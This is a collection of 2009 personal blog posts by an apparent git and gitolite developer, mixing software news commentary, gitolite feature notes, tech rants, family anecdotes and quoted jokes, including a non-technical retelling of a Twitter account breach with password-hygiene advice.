2009-12-30

hilarious... CIP (Ch* in progress)

http://www.fakingnews.com/2009/11/three-letter-word-invented-by-an-indian-mba-creates-stir-in-the-world/

quote (but read the whole thing on the original page, it's great stuff!):

Mumbai. Mr. Murali Chetankar, 29, an MBA from a top tier management institute of India has created a stir around the world. He has invented an all encompassing TLA (Three Letter Acronym or Three Letter Abbreviation), which can be used to describe the work that management graduates do. The acronym – CIP (Ch*tiyaps in Progress) is now universally accepted and understood. Oxford is planning to debate, discuss and include this TLA in its dictionary in the next revision. This is probably the first engineered Indian word to be included in the Oxford Dictionary.

The story of how this was invented is fascinating. Murali was perturbed by the frequent probing of his engineering college classmates as to what work he was doing post his MBA.  Frustrated by the repeated questions like 'Wazzup' and 'Whats happening', Murali decided to take the road less travelled and discover a word to explain what work he did. After much deliberation he realized that all he did for the last 3-4 years was nothing but Ch*tiyaps. In a fit of rage he updated his GMail status to "CIP – Ch*tiyaps in Progress".


2009-12-20

no comment...

http://code.flickr.com/blog/2009/12/02/flipping-out/

A previous blog post of mine was about the above link... well lets just say it was very frank :-)

After 2 people (including one person on #git I have a lot of respect for) seemed to not like it, I took it down.

However, since this blog is as much a sort of "historical bookmarking device for Sitaram", I need that link in there, so here it is.

You, my gentle reader, can draw your own conclusions.

2009-12-19

some things in life...

- a brand new Yamaha Fazer for your son: Rs 81,000
- driving classes and test for son: Rs 4000
- 2 tickets to New Moon: Rs 300
- taking your pre-teen daughter on a snazzy "young man's" bike to a
crap movie and having her say "dad I owe you bigtime": priceless

:)

2009-12-17

greedy licensing comes home to roost

quote from http://www.gnome.org/~michael/blog/2009-12-14.html

Boggled at Monty.

  • Yes - of course it is a lamers business model to have a restrictive license, coupled with copyright assignment, and dominance by a single company. Yes, of course it leads to strangulation of the community, and perpetuated dominance of a single player.
  • That this realisation appears to only have occured to Monty now he is trying to make a company fly on the other side of the very wall he himself built, smells pretty suspicious to me

2009-12-09

was COBOL this bad?

...maybe it never had the opportunity.

But the COBOL of the Internet (tm) seems to be...

http://lwn.net/Articles/364528

Google is forking existing FOSS code bits for Chromium like a rabbit
makes babies: frequently, and usually, without much thought. Rather
than leverage the existing APIs from upstream projects like icu,
libjingle, and sqlite (just to name a few), they simply fork a point
in time of that code and hack their API to shreds for chromium to use.
This is akin to much of the Java methodology, which I can sum up as
'I'd like to use this third-party code, but my application is too
special to use it as is, so I covered it with Bedazzler Jewels and
Neon Underlighting, then bury my blinged out copy in my application.'.
A fair amount of the upstream Chromium devs seem to have Java
backgrounds, which may explain this behavior, but it does not excuse
it. This behavior should be a last resort, not a first instinct.

and http://lwn.net/Articles/365445/ is even nicer...

2009-12-07

malware in Linux?

in a sudden spurt of SNR on /., I found *one* topic with *three* informative comments on this topic...

http://ask.slashdot.org/comments.pl?sid=1461872&cid=30284956
http://ask.slashdot.org/comments.pl?sid=1461872&cid=30280222
http://ask.slashdot.org/comments.pl?sid=1461872&cid=30278934

In addition, this gem landed up somewhere (couldn't find the comment now but it's in there somewhere: "bad analogies are like waxing a monkey with a rainbow"

2009-11-30

breaking the Pareto principle?

quotes from http://howsoftwareisbuilt.com/2009/11/18/interview-with-greg-kroah-hartman-linux-kernel-devmaintainer/

To give an example, for the 2.5 to 2.6 kernel development series, which took about two years, the top 30 people did 80 percent of the work. Now, the top 30 people do 30 percent of the work. The sheer number of developers has also increased. We were running a couple hundred developers, and now we're running a couple thousand.

[...]

We're also increasing the rate of change in our development. The same amount of work one of the top 10 developers did last year wouldn't have even made it into the top 20 this year. Our individual developers have got the work flow down, so we can actually contribute more, to an extent that's amazing.

perspectives, take 2...

http://ask.slashdot.org/comments.pl?sid=1460432&cid=30264494

This was in response to someone asking about network security while backpacking for a whole year through South America!

2009-11-29

stop the internet!

http://forums.theregister.co.uk/forum/1/2009/11/26/lse_crash_again/#c_635437

Subject: "despite a .NET upgrade overseen by Accenture"

Posted Thursday 26th November 2009 13:40 GMT

Hahaha hahahaha hahahahaha hahahaha <gaaaaaaaasp> ha haha hahahaha
hahahahahaha hahaha.

Stop the internet, nothing can ever beat the humour of this statement.

the ubuntu "mono" culture

lovely comment at http://www.linuxtoday.com/news_story.php3?ltsn=2009-11-25-031-35-OS-CY-0019 argues that the slow infiltration of mono-apps in Ubuntu was probably planned that way, and the more such apps get added the easier for non-mono apps to be rejected in favour of a notionally equivalent mono app.

Read the full comment; makes a very cogent point.

2009-11-19

finally, something interesting in Brooke's tale

until now, it was pretty boring. I never really liked her blog --
maybe it was too disjointed? or maybe I like my salacity in larger
doses? I don't know.

but this is cool:
http://www.timemachinego.com/linkmachinego/2009/11/16/me-and-belle-de-jour-could-it-be-brooke/
-- an early warning system that depends on googlewhacking

2009-11-15

(git) finally...!

http://git.kernel.org/?p=gitk/gitk.git;a=commit;h=70a5fc443acbd1fe69cc21c10190375facabaf93

This will fix a long-standing problem for git use at work, and give me
more confidence in saying to people "just stick to the GUIs and you
can't go wrong for most normal operations". I''d sent in the patch in
June but it got lost somewhere that time; this time it got accepted...

2009-11-13

directory level access control via gitolite

I'd like comments on this from my readers.  Don't worry if you don't know what git is.

All you need to know about git/gitolite to understand this post and comment is: (1) git is a modern version control system for source code, (2) git makes using branches (different development lines for the same project; like "release", "maint", "customer-specific", etc) almost trivial, and (3) gitolite is an access control layer that sits underneath it and implements restrictions based on branch name (ie., only the QA guy can push to the "QA-done" branch).

The question was: we need "path-level" restrictions also (I can only change files in subdirectory-A, you can only change files in subdirectory-B, etc).

Here's the email I sent the person who asked me for this feature, and on which I want your comments.

----------

I have a small philosophical objection to this sort of restriction.  Let me explain.

I want the computer to catch mistakes that are easy to make, and hard to reverse.  Pushing the wrong branch is a good example (esp if some branches have similar names), so gitolite is focused on branch permissions.

Touching a file in another directory is a mistake that is hard to make and easy to detect and stop.

Normal workflow is that devs only push to their own branches, from where their code is picked up for QA and (if accepted) moved to the main branch by someone with that authority.  If QA can't even detect that the wrong files have been touched, you have a bigger problem than gitolite can solve :(

Automating subdirectory based restrictions seems as if you are using gitolite as a substitute for internal team communications.  And maybe even trust.

2009-11-12

tutorial: how to watch a movie when you're supposed to be working...

You can do it, it's easy!  Here's how.

(Pre-requisite: a full-day business trip to Mumbai)

Step 1: plan your trip so that all flights (outbound and return) are the "first flight in the morning" kinds.  Mine were a 6am departure outbound and a 6:25am departure on the return.  A 1hr 15 min flight means I'm well in time to be at work by 9am on both days.

An advantage is that delays to first flight in the morning are highly unlikely (except due to fog in Delhi in winter, which is why we chose Mumbai for this tutorial)

(corollary to step 1: this means you have to wake up at 4am or so, but you take those things in your stride)

Step 2: make sure at least one of the flights is Jet Airways.  Bonus points if a Kingfisher flight crashed (no one injured, thankfully) the previous day, blocking half of a usable runway or something, but this is beyond your control.

Step 3: enjoy the movie

Eh what?  I missed a step?  Sure but those are not *your* steps.  Jet will take care of those.  I stole a flight suprintendent's notepad and copied these notes from the back of his book (they were written in invisible ink so I had a bit of trouble, but I'm persistent):

Step 1: most people don't know that the so-called "first flight in the morning to Hyderabad" is not what we in the trade call "AOG" (aircraft on ground).  It comes from Sharjah or Jeddah or Dubai or one of those middle-eastern sounding, why-in-blazes-would-I-ever-want-to-live-there[*] places.  This tricks a lot of people into thinking the flight is safe from delays, especially *in*frequent flyers.

[*] one good reason to live in those places: they don't have any terrorism. Sort of like Indonesia doesn't have any expensive Nike shoe stores maybe?

Step 2: make sure that flight is delayed about 30 minutes.  Also make sure it is parked as far away from the domestic terminal as possible.

Step 3: make sure at no time do you announce a delay more than 10-15 minutes;  20 minutes tops...]

Step 4: as soon as some passengers (already irritable from having to wake up at 4am), start arguments about breakfast coupons due to the delay, announce boarding.  Have them go through the final security guard and approach the bus that will take them to the aircraft.

Step 3.9: err, we forgot -- go back to just before step 4 and make sure there is no bus actually waiting.  The passengers cannot re-enter the building and pick a fight with you now; security will stop them.  This is a useful technique to use when passengers get irritable for silly little things like delays and breakfast, and the lack of any update that goes beyond 20 minutes.

Step 5: eventually find a bus and send the PAX to the aircraft.  Finish all the boarding formalities but don't take off for about 1hr 30 minutes.

Step 6: Blame DGCA/ATC for everything.

----

Author's note: some of the fault *was* indeed the DGCA/ATC/Mumbai airport, but Jet could have done a lot to mitigate it.  They did *nothing*.  To add insult to injury, they sent out a 7:40 departure flight on time (while we were cooling our heels inside the aircraft till 9:45).

2009-11-11

(funny) slashdot comment on cloud

(though the original article may not have had anything to do with it, but hey this is /.)


Re:Buzzwords, because thinking is hard
by megamerican (1073936)

"No officer, I'm not naked. I'm a trend setter in cloud clothing. That man over there is wearing pants for me. Honest."

2009-11-08

(git) clearcase speed

from http://permalink.gmane.org/gmane.comp.version-control.git/132311,
in response to someone touting CC's ability to track partial repos and
asking why git can't do that:

> My (limited) experience with ClearCase is that it's so slow that you'd do *anything* to track fewer files in your working copy, so they put a lot of work into exactly that, and no work into performance.

2009-11-06

made my day...

The maintainer of a very popular library in the perl world (LWP.pm) is using gitolite and wrote to me to say thanks and it is working well for him :-)

He probably wrote more perl in a month than I wrote in all my life so this is a "wow" moment for me!

2009-10-29

third strike against Canonical (Ubuntu's parent company)

http://lwn.net/SubscriberLink/359013/c1b70c36dd9fab59/

As before, the fact that it is the extremely balanced Jon Corbet who's saying this that makes it a deal breaker.

2009-10-23

I've never...

been *drunk* and at my desk at work!

Thank you, NC!

2009-10-20

(funny) "teradata" and "cheap" in the same sentence

from http://www.theregister.co.uk/2009/10/19/teradata_blurr/ :

Of course, it was never going to be cheap. People very rarely use the word "cheap" and "Teradata" in the same sentence. It can be done, but you have to say something like: "Blurr is four times less cheap than the comparable rotating disk appliance from Teradata." But then it is an astonishing eight times less slow.

(criminal) another strike against ISB

this can't be good.  First it was the dean B Rammohan Rao who was on the board of directors of Satyam and voted in a manner that even the man on the street knew was unethical.

Now it seems another director/co-founder of ISB, someone called Anil Kumar, is indicted in the insider trading scam that's currently happening in the US.

I'd been tarring most recent MBAs with the same feather, but it seems ISB is a cut above the rest in malfeasance.

[no web link yet; this is from this morning's DC...]

2009-10-19

"no more kaspersky"

well, Eugene Kaspersky turned out to be a proper old moron, which is what you'd expect from someone who makes his living off of Windows' insecurities.

The number of people on http://www.theregister.co.uk/2009/10/16/kaspersky_rebukes_net_anonymity/comments/ saying "well that's it, I'm not going to renew my AV license from this joker" or words to that effect is amazing!

2009-10-15

(malware) finally, a journalist gets it right

I've ranted before about how most journalists reporting on malware refuse to indict or even mention the operating system that is invariably involved: Microsoft Windows.

Finally, Brian Krebs of the Washington Post does it.

Bluntly and coldly.

Not only that, he recommends not using Windows, at least for banking transactions.  Read the article for some really chilling facts.

http://voices.washingtonpost.com/securityfix/2009/10/avoid_windows_malware_bank_on.html

2009-10-14

Joel on pointers

[...] until one day their professor introduces pointers, and suddenly, they don't get it. They just don't understand anything any more. 90% of the class goes off and becomes PoliSci majors, then they tell their friends that there weren't enough good looking members of the appropriate sex in their CompSci classes, that's why they switched.

http://www.joelonsoftware.com/articles/fog0000000073.html (yes it's quite an old story...)

2009-10-05

just in case anyone wants proof...

I mean, I knew it all along, but there are so many sceptics...

http://xkcd.com/224/

2009-10-01

how to get rid of old code in a widely used product

quote from http://lwn.net/Articles/354408/

X is no longer stagnant; it is being heavily developed under freedesktop.org. As X has come back to life, its developers have had to do a massive amount of code cleanup. Keith has figured out a fail-safe method for the removal of cruft from an old code base. The steps, he said, are these:

   1. Publish a protocol specification and promise that there will be long-term support.
   2. Realize failure.
   3. "Accidentally" break things in the code.
   4. Let a few years go by, and note that nobody has complained about the broken features.
   5. Remove the code since it is obviously not being used.

Under this model, the XCMS subsystem was broken for five years without any complaints. The DGA code has recently been seen to have been broken for as long. The technique works, so Keith encouraged the audience to "go forth and introduce bugs."

2009-09-29

there's marketing, there's bad marketing, and then there's Microsoft marketing!

hilarious!

http://www.cnbc.com/id/33007219/

quote: "If Microsoft had been put in charge of marketing sex, the human race would have ended long ago, because no one would be caught dead doing something that uncool."

But it's a short article; read it!

2009-09-26

gitolite is done...

I think gitolite is done now.  It does everything [*] that gitosis does plus a lot more besides.

Here's a brief summary, of what's new and improved, as of today.  Most of this is elaborated here, if you want to read more.

What's NEW:

(1) the original reason for gitolite's creation: per-branch permissions.  Being able to say "only Alice and Bob can push the master branch" is great!

(2) rewind permissions: being able to say "only Alice can rewind any branch" is even greater :-)

(3) very useful logging.  Here's an example:

2009-09-19.10:24:37  +  b4e76569659939  4fb16f2a88d8b5  myrepo refs/heads/master       user2   refs/heads/master
The "+" means this is a rewind (this would be "W" for a fast-forward update).  The two SHAs (14 digits are preserved) are the old and the new.  The repo name, the refname being updated, and the user, are next.  The last field is the exact pattern in the config file that matched to allow this update to happen -- great for debugging (rejected attempts don't come to the log file; but enough info shows up on the user's terminal to debug this anyway)

(4) "personal" namespace for refs, per developer; see the link above for details

(5) you can have "excludes" (aka "deny") in the config file if you use the "rebel" branch.  Suddenly opens up a heck of a lot more power for your access control config :-)

(6) ummm this is not something I'd expect gitosis to have but I also have a migration guide for gitosis users plus a simple tool to convert a gitosis config file to gitolite syntax (except gitweb/daemon config).

What's IMPROVED:

(1) "push to admin" is not available by default.  It's a great feature, but it is a support nightmare, and it's a completely unnecessary hill to force a newbie to climb.  However, I do provide clear instructions on how to set it up yourself, and I admit I use it myself.

(2) the config file has a much saner syntax.  Very clean, no clutter.  Also, you can slice and dice your config anyway you want and gitolite will combine it all in its head.  See example here or elsewhere in the documentation.  If you're not sufficiently impressed by this, you haven't thought about it enough or your needs are not complex enough :-)

(3) the way to specify gitweb and daemon is much more intuitive and consistent with the rest of the "permissions" syntax.  Just treat them as two special users "gitweb" and "daemon" -- if they have read access to a repo, then so does the corresponding tool :-)

(4) combine #2 and #3, and you get far, far, easier ways to setup gitweb/daemon support for many many many repos easily.  Gitosis required you to setup each repo separately in its own paragraph (probably because of the "description" tag)

What's MISSING:

[*] Speaking of the "description" tag, that's the only thing gitosis does which gitolite doesn't.  But you can do it offline if you like, and if you don't use gitweb (I don't) then it may not even matter to you.

2009-09-11

perspectives

Our main departmental server had gone down today around 4:30pm; no idea why.  We checked all the usual things and brought it up, and later in the night I had a false alarm that it was down again.  This is what happened after I realised it was a false alarm and felt a little euphoric.

My daughter was standing next to me, so I gave her a hug and said, emotionally, "it's working, it's working, thank God it's working".

She said "what"?

"My server", I replied.

"That's all you can think of"?...  A brief pause; then: "here I am running out of nail polish remover and you're worried about a server?"

2009-09-06

Fwd: FW: FRIENDSHIP . . . .

What is friendship?

Someone sent me a semi glurge email talking about how you lose friends by not keeping in touch with them. The UNoriginality and chain nature of that email can be gauged by how quickly I could find a dozen links to the text within the email, just so I can tell you what it was without actually forwarding the email itself.

Anyway, it got me thinking...

I count a few friends whom I will do most anything for. And who've probably done more for me than I have ever done or can do. Not Jai-Veeru level friendship, but ordinary human beings level certainly.

So let's pick one of them.

He and I hardly ever talk. Or even email. No farcebook updates (I'm not even sure he has an account, and I certainly don't) No SMSs (I'm not even sure what his cell phone number is). We don't meet often (he lives in Florida, I in India). Or anything.

But not a month goes by without me thinking of him in some context, and I'm sure it's the same for him. He'll email me when he has something to say, and I'll email him when I have something to say. Otherwise... dead silence.

Notice I said *month* :-) I really don't think of him every single day or week. Not that there's anything wrong with that of course :)

I haven't checked my google account, but vague memory, dulled by 3 rounds of Bailey's Irish Cream, tells me it's been at least 6 months since we last communicated. And in the past it has been as much as 1 year or more at times. And we've only met once in the last 7 years or so.

But when we do email again, we're liable to phrase the email as if we're continuing a conversation that was discontinued just a few minutes ago. Or start a new one without *any* preamble ("hey, how you doing... been a long time... how's the family? Good -- yeah my kids are [blah blah]...", and eventually, get to the nub: "say listen I was wondering, you know that [...] you once mentioned? Well I was talking to a friend...")

So is this friendship? You tell me...

Because according to that email, this guy and I are no longer friends :-)

PS: to all my friends, you know who you are: I love you all. And yes, at least part of that is the Baileys talking, but Baileys can only change the words. Not the thought.

2009-09-03

a pol dies an untimely death

I thought I'd always, always, wish ill of any politician.  Any party, but especially this most corrupt and desh-drohi bunch of crooks, led by that Italian woman, selling India down the river in every way imaginable.

Perhaps I'm not as cynical as I thought I was...  because it still feels sad.  All said and done, he has a wife, kids, grandkids...  It's not how many people need you, it's how many people want you that counts I guess, and he will probably be missed by those.

[for my one non-Indian reader: the CM of my state (eqvt to a governer in the US) died in a copter crash yesterday in a remote area]

2009-08-26

gitolite -- managing multiple git repositories

[this article rated G (Geeks only), GG in some geographies (Git Geeks only)]

Well, after more than a year of using and championing gitosis, I finally got off my duff and created "gitolite".

It is certainly inspired by gitosis's basic ideas, but it lets you specify per-branch permissions -- which is a really big thing and something I am often asked about at work.  It's written entirely in perl (of course), and designed to be installed and used, without needing root access, on any Unix machine that managed to install git and perl.  And I think my config file format is much simpler than gitosis's, but maybe I'm prejudiced :-)

The README (nicely formatted, thanks to github) is at that same URL; just go down the page a little.

2009-08-10

what distro do I favour...

[offby1 asked me this in a comment to a previous blog post.  I replied briefly, then realised I had a lot more to say on the subject.]

I've been a Mandrake user since late 99 or early 2000 or so.  I had a brief flirtation with Ubuntu in between, but it didn't work out.

I'm a confirmed KDE fan -- I never liked Gnome philosophically, even before Mono dependencies like F-Spot and Beagle starting becoming standard.  I hate the look and feel, I hate the minimalism, and I really, *really*, hated that if I mounted my home directory temporarily on a colleague's Gnome box using the GUI (sftp://sitaram@my.ip.address), Gnome would remember the credentials for a long time afterward, while KDE would obligingly forget about them immediately.  [Tested again today; Gnome now has a nice button that says "forget password immediately".  Whoo hoo!  But does it forget?  No!  After 2 minutes it still remembered it -- it had kept the VFS session open in the background and just reconnected when the URL was typed in again.  I didn't wait around to see when it expires; I just killed the processes that seemed to have the connection open and changed my password just in case!  Bloody awful security if you ask me...]

Ok where was I... KDE, right...

But recently, having to install MDV 2009.1 on my dad's old clunker made me realise the charms of one of the alternative desktop+WMs.  Specifically, LXDE+openbox -- it's really fast compared to KDE.  And when I tried it on my Core 2 Duo + 2GB desktop, I was surprised to find that it makes a difference even on that, so that's what I use now.

Of course, there are many pieces of KDE I need, and like.  For example, the hardware volume buttons on a laptop only respond when "kmix" is running, so I run kmix.  I still like "konsole" more than "lxterminal".  Then there's Okular, dolphin, gwenview (a KDE program whose name starts with a "G" -- go figure!), krusader, all of which I like very much.  I just no longer run kwin (the window manager) that's all.

In fact, it actually doesn't matter even if I *install* all of KDE -- hard disk space is not the problem.  They just don't get loaded into RAM, that's all.

Downside: I lose all the fancy transparency stuff.  That was cute, and even useful sometimes (like typing something into the bottom window while reading off the top window which was at 75% transparency -- very impressive!) but I can live without it.

...and people wonder why git is so fast

over the past few days, there has been a huge amount of activity on the git mailing list, mostly from Linus himself, over the speed of the SHA-1 routines within git.

Being the "God" he is, one hesitates to call him names like "obsessive compulsive". Thankfully, it looks like he's enough of a human to do that himself :-)

-------- Original Message --------

via Linus' blog by Linus on 8/9/09
I've actually written code lately, although for some reason it's been all these stupid projects. First I needed to fix the kernel tty refcounting, then I got all OCD on the git SHA1 routines.

I don't quite know why I wasted that much time on something as trivial as SHA1 hashing, but it was kind of fun in a "let's use the compiler as a glorified assembler" kind of way. Some people seem to think that C is a real programming language, but they are sadly mistaken. It really is about writing almost-portable assembly language, and it turns out that getting good results from SHA1 really is mostly about trying to fight the compilers tendency to try to be clever.

So here is the current result of me trying to get gcc (well, arguably of it is mostly the C pre-processor, rather than the compiler proper ) to generate good assembly code. On my Nehalem machine (but not Netburst or Atom - poor fragile micro-architectures that they are), it actually seems to outperform the OpenSSL hand-written assembly language implementation.

And once I get rid of libcrypt from openssl, I get rid of two silly runtime loadable libraries that git no longer needs. And that in turn speeds up the test-suite by a couple of seconds.

Did I mention that I seem to have some OCD issues?

2009-08-08

yet another reason to not recommend Ubuntu

http://lwn.net/SubscriberLink/345945/f2292e2a33d95465/

The first para is quite hard hitting.  And this is from Jon Corbet, the LWN editor, who's much more likely to understate things than otherwise, so that sorta doubles the effect

how to meet a friend you haven't seen for a while

...get your car stuck somewhere close to his home and call him :-)

Thanks, R!

2009-08-04

the Whitman defense

"I contradict myself? Very well then I contradict myself. I am large, I contain multitudes."

...awesome!

(from http://arstechnica.com/microsoft/news/2009/08/microsoft-word-1983---2009-rest-in-peace.ars)

2009-08-03

how twitter got hacked...

http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/

no technical hacking here; very, very simple stuff; please read (especially K)

Step 1:

When you register a new gmail account you give them a "secondary" email.  If you forget your password you can ask gmail to send a "password reset" link to this secondary email.

In this case, the hacker found that

  - his victim had a "hotmail" address as a secondary
  - he had not used that address for years
  - so hotmail had expired/deleted it (I don't blame them on this; even if it is MS!)
  - so anyone was free to register that address again
  - so the hacker simply registered it himself
  - thus getting the "password reset" email for his victim's gmail account :-)

Step 2:

The second part is even simpler.  He needed to reset the password back to what the owner **currently** uses, otherwise the owner would get suspicious (if he was unable to log in next time).  And he needed to do this very quickly.

  - he looked through all the saved email on the hacked gmail account
  - found a few passwords helpfully sent back by various services to which the victim had subscribed
  - gambled that the victim uses the same password for everything
  - and reset the gmail password to that

Step 3:


Once he was sure everything was OK, he just used that same password to access the victim's **official** twitter email.

Conclusion:

Who needs cryptography, buffer overflows, complicated shellcode, rootkits, and all that techie stuff when users can be this naive :-)  I mean there's not a byte of code or a mangled URL or a malicious Javascript or even a single HEX character in this whole thing!!!

Moral of the story:

  - never use the same password for more than one service.
  - delete registration emails from websites if they contain your password.  Be sure to empty trash (or "delete forever") too
  - in any case, change your passwords once in a while

"your toddler may be violating a patent"

found on a slashdot sig somewhere, with a link to:

http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=/netahtml/PTO/srchnum.htm&r=1&f=G&l=50&s1=6,368,227.PN.&OS=PN/6,368,227&RS=PN/6,368,227

amazing...  absolutely amazing.

so now I have to *thank* those fscking yellow plates?

http://physicscentral.com/buzz/blog/index.cfm?postid=3414795237807494042

It seems that traffic jams are least probable when about 40% of the drivers are breaking a few rules.  No word on what happens if that 40% is more like 60%, *and* they break *every* rule though.

PS: for my one and only non-Indian reader: taxis (and other "for hire" vehicles) in India carry yellow license plates (normal ones are white).  And said taxis are far and away the **WORST** drivers in any sense of the word.

2009-07-29

the madness of corporate disclaimers on emails

So I was researching some security product, and I came upon this:

http://www.xml-dev.com/pipermail/fde/2007-May/000305.html

This is amazing.  Most corporate emails are infested with this crap anyway, but I've never seen one this bad.

I count 18 words of "actual message", 29 words of the guys signature, including all sorts of details that should never be seen on a public site, and -- get this -- 167 words of "legal disclaimer".

Amazing...

2009-07-23

plain text to PDF via Markdown and Beamer...

...and a little perl in between

My problem is that office software sucks, and presentation software sucks even more.  Too much mousing around needed (and it doesn't matter whether it is OpenOffice or MS Office; I hate them both equally)

All these years, my presentations have consisted of plain text on plain white backgrounds, with hardly any pictures.  I start sweating if I have to make a picture or a chart.  My preferred editor for everything and anything under the sun is vim.  Even my firefox browser is controlled by something called vimperator that lets me use vi keystrokes.

Anyway to cut a long story short, having to make one more presentation sort of broke me.  I'd tried various solutions in the past, but none of them seemed to work, so I finally bit the bullet, learned enough about LaTeX and Beamer to be able to generate input for Beamer, and I had a pretty decent PDF generator that takes HTML.  The HTMLcomes from plain text via Markdown, which is a wiki-like language that I really like.

[If you've never seen a wiki language, it's basically a simplified markup, like using **bold** and *italic* instead of <em>italic</em>, and so on -- the resulting document looks and feels pretty much like plain text when you're editing it, but when you pass it through the Wiki engine (in this case, Markdown), it gets converted to nice HTML].

So, I type in plain text using Markdown's minimalist syntax, Markdown converts it to HTML, I write a little perl program that converts the HTML to LaTeX, and then pass that to Beamer, which produces a really snazzy PDF, with nice colors, slide navigation, etc etc.

Done.

Well not quite.  I was using something similar for images (a package called graphviz).  Graphviz takes text like this:

        digraph {
            node[fontsize=24]
            a -> b -> c -> d
            b -> p -> q -> x
            p -> y
        }

and produces a neat little picture that I can't really show you in a blog post that doesn't seem to like images (well I pasted it at http://imagebin.ca/view/IWKbKYdH.html but that might not last forever).

Anyway now I got really greedy.  Since a lot of the "pictures" I had to make could be done using graphviz, and I was starting to use it more and more, I wanted to have it all in one file.  Text, images, the whole thing in one easy to edit text file :-)

So I did that next.  Made up a nice easy syntax that tells my HTML->LaTeX processor this is inline graphviz code, so it picks it out, runs graphviz on it, and puts the file in /tmp where Beamer picks it up.

[Along the way something amusing happened.  I'd hardly ever used LaTeX before, so everything was new, and at one point I went on to #latex to ask a question.  The helpful folks there (one of them was also a #git guru by the way) bombarded me with information such as TikZ, which contained far too much LaTeX for my taste.  I don't really like LaTeX syntax, though in its own way it's very beautiful and you can write it nicely and all.  [eh?  what's that?  Yes my favourite language is still perl.  Why do you ask?]

I did not have the heart to tell them that I would never directly code LaTeX to save a dying grandmother -- they were so nice and helpful it would seem like trolling.  But I bookmarked the URLs offered anyway, in case I ever change my mind.]

So that's my adventures in PDF making.  If you want to see sample input and output to get a feel for it, email me.

2009-07-21

the world as we know it is ending...

via LWN.net by corbet on 7/20/09

Microsoft has joined the community of Linux kernel contributors with the addition of its Hyper-V drivers, soon to appear in linux-next. "These drivers are to enable Linux to work better when running as a guest on top of the Hyper-V system. There is still a lot of work to do in getting this into "proper" mergable state, and moving it out of the staging directory..."

2009-07-18

the Qualcomm conspiracy...

or: why are CDMA phones so much more expensive and still look like crap?

My company, in its infinite wisdom, has decided that we should all switch to a CDMA platform. Now, for some reason I could never explain till now, I've always hated CDMA. Enough that I almost refused the company cell phone, though practical necessity finally won and I toed the line. [I mean, I already have a rep for saying "sorry, your stupid software doesn't work on Linux so I can't use it/join the conf call/whatever"; it would look terrible if I said "sorry, I can't call you at 9pm because I refused a company cell phone" :-)]

Anyway, getting back to my rant for the day/week, I spent a couple days looking at CDMA phones. Invariably, they look like crap compared to a similarly priced Nokia, and their UIs suck golf balls through chem lab pipettes, but meh, I'll manage.

Then I find a Nokia phone that does CDMA; something called the 6275. This has exactly the same features as my 3310 Classic GSM phone, except the camera is 2MP (versus 1.3MP on mine). Cool, I'm in heaven!

The cost? Just about double that of the GSM model, give or take a bit.

Now, some of you know about the long legal battle between Nokia and Qualcomm, and Qualcomm owns CDMA, so you're thinking, well duh! Why would they make it cheap for Nokia?

So fine, back to plan A -- I'll buy a Samsung. I just want MIDP because I got used to being on IRC whenever I'm forced to sit around at a boring place (ahem!).

Well guess what? the cheapest Samsung CDMA phone that has MIDP is more than 3X the cost of the cheapest GSM phone from Samsung.

Now if that is not because of Qualcomm taking their pound of flesh for CDMA technology itself, I don't know what it is.

Damn Qualcomm. And double-damn "Brew", their horrible, proprietary, expensive, apology of an excuse for Java competition. Including their "we have to control what runs on your phone" attitude too. I hope they all burn in hell. So much for market forces, what a load of crap...

Anyway, I have made a decision: I will only buy extremely low end CDMA phones, which do just the bare minimum (voice and SMS only), because I have to believe the profit margin on these can't be much. They'll never get a penny more from me than is absolutely, minimally, necessary.

----

and now, my "some reason I could never explain" seems vindicated! Dare I think myself so intuitive about these things that even my unreasoned prejudices end up having a rational explanation when you look deeper? Wow... :-)

2009-07-17

why basic infrastructure components should never be closed source...

...or at least, when they are not open source, you should treat them as hostile and malicious.

http://www.securityfocus.com/news/11555?ref=rss

excerpts:

An update pushed out to BlackBerry users on the Etisalat network in the United Arab Emirates appears to contain remotely-triggered spyware that allows the interception of messages and emails, as well as crippling battery life.

Interestingly, it seems it was the battery life that drew attention and investigation. This was a minor design error, easily fixed, and then no one would have noticed this application!

2009-07-14

Pinching myself and checking what year it is...

So I got an invite to join some call from a vendor trying to sell us something (I can't name names, and in this case they're irrelevant). They chose to send us an invite which included this:

https://www2.gotomeeting.com/join/[somelongnumber]

So I go there, and I see:

To join the Meeting, please use one of the following supported operating systems:
• Windows® 2000, XP Pro, XP Home, 2003 Server, Vista
• Mac OS® X, Panther® 10.3.9, Tiger™ 10.4.5 or higher

OK, I've seen this sort of crap before, and can often get around it using UA switcher or something, so I try that next.

Guess what? They want you to download and install an actual EXE!

So now this is like a flashback to at least 4 years ago. I hope webex, which now works pretty damn well inside FF on Linux, is eating their lunch!

Anyway, after a bit of searching I found a "support" url with a feedback form of some sort, so I sent them this:

I was supposed to join a call starting shortly, and find I cannot, because you don't support Linux. How quaint...

Well it's 8:30pm in India, where I am, so thanks for letting me off the hook on that call and really enjoying dinner with my family.

:-)

2009-07-05

EVMs again, in a real democracy...

http://www.greatandhra.com/ganews/viewnews.php?id=14612&cat=&scat=16

Not sure how terribly accurate that virtually unknown newpaper is, but a shorter version is at http://timesofindia.indiatimes.com/India/EVMs-can-be-easily-tweaked-Expert/articleshow/4739375.cms -- presumably an NYTimes style pay site or the dead-tree version would have the extra details that the greatandhra site shows.

The summary: some of the other political parties have been complaining that the EVMs can indeed be tampered with, and the EC (Election Commission) is looking into it very seriously, calling for meetings with officials of the two "public sector" companies (that's a phrase that basically means "majority owned by the government", although they do also trade on the stock markets like any other company), etc.

Even with no details of the "exploit", I feel very good about this.  Look at how they're handling it, compared to the Diebold situation in the US.  What I said in http://www.schneier.com/crypto-gram-0412.html#11 still stands -- the entities are public sector companies, and the EC is quite independent.  (Hopefully even with the current Election Commissioner, Naveen Chawla, being a corrupt Sonia Gandhi/Congress party lackey)

In the US, as far as I recall, things had to go to court before anyone could see how the damn things worked.

And even then, it wasn't the political parties who went to court (again, as far as I remember, please correct me in comments if I'm wrong) it was the EFF or something like that.  Another sign that an essentially 2-party system is not quite democratic enough.

Yes, a true multi-party system is much more chaotic, but as a friend of mine said, maybe it is easier to "fix" things when the number of players is small.

And oh by the way, a "true multi party system" is a common enough state of affairs in the open source world too.  Coincidence?  I think not!

(criminal) get paid for screwing up

wow... I must have been asleep under a rock these last few days.  I did not know this till today:

http://www.itwire.com/content/view/26018/1090/

Apparently an attack by the Conficker worm has cost the Manchester Council in England around £1.5 million - and Microsoft experts were among the consultants called in and paid some of that swag.

